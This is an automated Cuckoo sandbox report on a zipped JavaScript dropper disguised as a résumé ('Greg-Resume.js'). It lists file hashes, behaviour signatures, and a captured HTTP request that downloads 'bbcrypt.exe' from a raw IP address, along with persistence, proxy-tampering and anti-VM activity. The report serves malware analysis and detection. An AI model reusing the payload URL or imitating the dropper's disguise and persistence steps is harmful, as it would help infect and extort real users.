Category |
Started On |
Completed On |
Duration |
Cuckoo Version |
FILE |
2016-08-22 20:25:03.600433 |
2016-08-22 20:26:05.925865 |
62 seconds |
2.0-dev |
Machine |
Label |
Manager |
Started On |
Shutdown On |
win7cuckoo |
win7 Clone 1 |
VirtualBox |
2016-08-22 20:25:04 |
2016-08-22 20:26:05 |
File Details
File name |
da0042e4ca77ad11ec0a9c10571b01d07d582d2b.zip |
File size |
4447 bytes |
File type |
Zip archive data, at least v2.0 to extract |
CRC32 |
06BAC4ED |
MD5 |
6a5689dae28663ab8fa7d19d5f426e85 |
SHA1 |
da0042e4ca77ad11ec0a9c10571b01d07d582d2b |
SHA256 |
4e1dcb723bba7d94489152292ded593a9e1d107989169e947d6b179172dc2b56 |
SHA512 |
5d356f13f7fe582f0e413191d469996e205232abc996b37adc51ef60d20e276688d8ecf02fbe9fa2586171ce53ad30295b32bfb52cc642f470b59dd949fa90cc |
Ssdeep |
96:KXdBWeXpCRvL2FVs9awzWcuBjIUSDDGr8wH7:K7WeXpMvqFV4awycumU+jwH7 |
PEiD |
None matched
|
Yara |
|
VirusTotal |
File not found on VirusTotal
|
Signatures
recon_fingerprint details
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
dumped_buffer details
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Windows_Connection_Settings_Accessed details
touches network settings in the registry
suspicious_process details
Creates a suspicious process
Windows_Proxy_Tinkering details
Accesses or modifies proxy settings
network_wscript_downloader details
Wscript.exe initiated network communications indicative of a script based payload download
persistence_ads details
Creates an Alternate Data Stream (ADS)
antivm_generic_cpu details
Checks the CPU name from registry, possibly for anti-virtualization
antiav_bitdefender_libs details
Detects Bitdefender Antivirus through the presence of a library
antivm_vmware_files details
Detects VMWare through the presence of various files
antiemu_wine details
Detects the presence of Wine emulator
injection_runpe details
Executed a process and injected code into it, probably while unpacking
Screenshots
No screenshots available.
Static Analysis
Nothing to display.
Dropped Files
File name |
e3b0c44298fc1c14_npicgzugz.txt |
File size |
0 bytes |
File type |
empty |
MD5 |
d41d8cd98f00b204e9800998ecf8427e |
SHA1 |
da39a3ee5e6b4b0d3255bfef95601890afd80709 |
SHA256 |
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
SHA512 |
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Ssdeep |
3:: |
Yara |
None matched
|
File name |
ca51b6961bcd15f5_15iy37s3aay.exe |
File size |
545792 bytes |
File type |
PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
MD5 |
11d4dbf3863f71f431a0ca39850acf97 |
SHA1 |
af505af0e001de4f6470c679afa786ab752d0c56 |
SHA256 |
ca51b6961bcd15f50faa096d5bc987dc0ad41441175d5551ce6c3927e553e136 |
SHA512 |
3fbb2c719341d2c30d41c0ce2544670a88b5556096de868bea88ffba6fd54b50d9f5a7a9dbb4ff4744060a4919aaa94a5a21cc45b6cdd6b84e45e835378150a1 |
Ssdeep |
12288:B6oh8b+tu7CLs0qJIzrgPch80V+idl7+iuDsL:BR8bpO9KQ80Vxdt+zDsL |
Yara |
None matched
|
File name |
d8e491d8ee3e048b_Greg-Resume.js |
File size |
10506 bytes |
File type |
ASCII text |
MD5 |
e075bbf722693ef2ef1c9f4b871e3d5e |
SHA1 |
5f69dba7e77a44dc1bab0363ddc0c2fb14ea5f5a |
SHA256 |
d8e491d8ee3e048b66882faa3a6bec02ae3c66857396d4225c8a3604611feded |
SHA512 |
1472df284d41758b7831bed0281fe0d7f0306ee8350d8dbe1300709b6cdc40325fbd3e11b434709c992808305073be021abf8a28234d4b9927633010ddd27517 |
Ssdeep |
192:WnPon7dSlC5ORiL0RV/4ScXhlFl7koXIS+U+djdi:w/l8Og0RV/4ScXhd7ko/+Jdo |
Yara |
None matched
|
File name |
Greg-Resume.js |
File size |
10506 bytes |
File type |
ASCII text |
MD5 |
e075bbf722693ef2ef1c9f4b871e3d5e |
SHA1 |
5f69dba7e77a44dc1bab0363ddc0c2fb14ea5f5a |
SHA256 |
d8e491d8ee3e048b66882faa3a6bec02ae3c66857396d4225c8a3604611feded |
SHA512 |
1472df284d41758b7831bed0281fe0d7f0306ee8350d8dbe1300709b6cdc40325fbd3e11b434709c992808305073be021abf8a28234d4b9927633010ddd27517 |
Ssdeep |
192:WnPon7dSlC5ORiL0RV/4ScXhlFl7koXIS+U+djdi:w/l8Og0RV/4ScXhd7ko/+Jdo |
Yara |
None matched
|
Network Analysis
IP Address |
52.169.179.91 |
8.8.8.8 |
93.174.91.49 |
Domain |
IP Address |
teredo.ipv6.microsoft.com |
67.195.61.46 |
dns.msftncsi.com |
131.107.255.255 |
ipv6.msftncsi.com |
|
URL |
Data |
http://93.174.91.49/bbcrypt.exe |
GET /bbcrypt.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 93.174.91.49
Connection: Keep-Alive
|
Behavior Summary
File-Read
- C:\Windows\SysWOW64\explorer.exe
- C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe
- C:\Windows\System32\wshom.ocx
- C:\Windows\System32\stdole2.tlb
- C:\Users\Harry Dresden\AppData\Local\Temp\Greg-Resume.js
- C:\Windows\System32\msxml3.dll
- C:\Users\Harry Dresden\Desktop\desktop.ini
- C:\Windows\System32\wscript.exe
File-Written
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YLC2QM2Y\bbcrypt[1].exe
File-Deleted
- C:\ProgramData\Windows Font Preloader Service\npicgzugz.txt
- C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe:Zone.Identifier
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000000.db
- C:\Users\Harry Dresden\AppData\Local\Temp\Greg-Resume.js
File-Opened
- C:\
- C:\Windows\SysWOW64\ntdll.dll
- C:\ProgramData\Windows Font Preloader Service
- C:\Windows\SysWOW64\tapi3.dll
- C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\System32\wshqos.dll
- C:\
- C:\Users\Harry Dresden\AppData\Local\
- C:\Windows\System32\msxml3.dll
- C:\Users\Harry Dresden\Desktop\desktop.ini
- C:\Windows\System32
- C:\Windows\System32\cmd.exe
- C:\Windows\System32\wshom.ocx
- C:\Users\
- C:\Users\Harry Dresden\
- C:\Users\Harry Dresden\AppData\
- C:\Users\Harry Dresden\AppData\Local\Temp\Greg-Resume.js
- C:\Windows\System32\en-US\wshtcpip.dll.mui
- C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac
- C:\Windows\System32\en-US\wshqos.dll.mui
- C:\Windows\
- C:\Windows\System32\en-US\wship6.dll.mui
- C:\Windows\System32\wscript.exe
- C:\Windows\System32\stdole2.tlb
- C:\Windows\Globalization\Sorting\sortdefault.nls
- C:\Windows\System32\
- C:\Users\Harry Dresden\AppData\Local\Temp\
- C:\Windows\System32\rsaenh.dll
- C:\Windows
- C:\Windows\System32\ieframe.dll
- C:\
- C:\Windows\Globalization\Sorting\sortdefault.nls
- C:\Users\
- C:\Users\Harry Dresden\
- C:\Users\Harry Dresden\AppData\
- C:\Users\Harry Dresden\AppData\Local\
File-Moved
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp -> C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe
Directory-Created
- C:\ProgramData\Windows Font Preloader Service
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YLC2QM2Y
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Caches
Directory-Enumerated
- C:\Users\Harry Dresden
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp
- C:\Users\Harry Dresden\AppData\Local\Temp
- C:\Users\Harry Dresden\AppData\Local
- C:\Windows\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
- C:\Users
- C:\Users\Harry Dresden\AppData
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp
Registry Key-Deleted
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDetectedUrl
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDetectedUrl
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Registry Key-Written
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\335446143c8
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\77c0dfcb60ac5c
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\dab2d44ff47
- HKEY_CURRENT_USER\Software\AppDataLow\Google Updater\LastUpdate
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\a4a7fbfdcd2e
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\6bf5ee163c0c6ac03bc
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\813b2c69f961f2b6be
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\0ca5b420d3cfe95e35
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDecisionTime
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadNetworkName
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
Mutex-Accessed
- Local\ZonesCacheCounterMutex
- Local\ZonesLockedCacheCounterMutex
Processes
registry
filesystem
process
services
network
synchronization
Volatility
Nothing to display.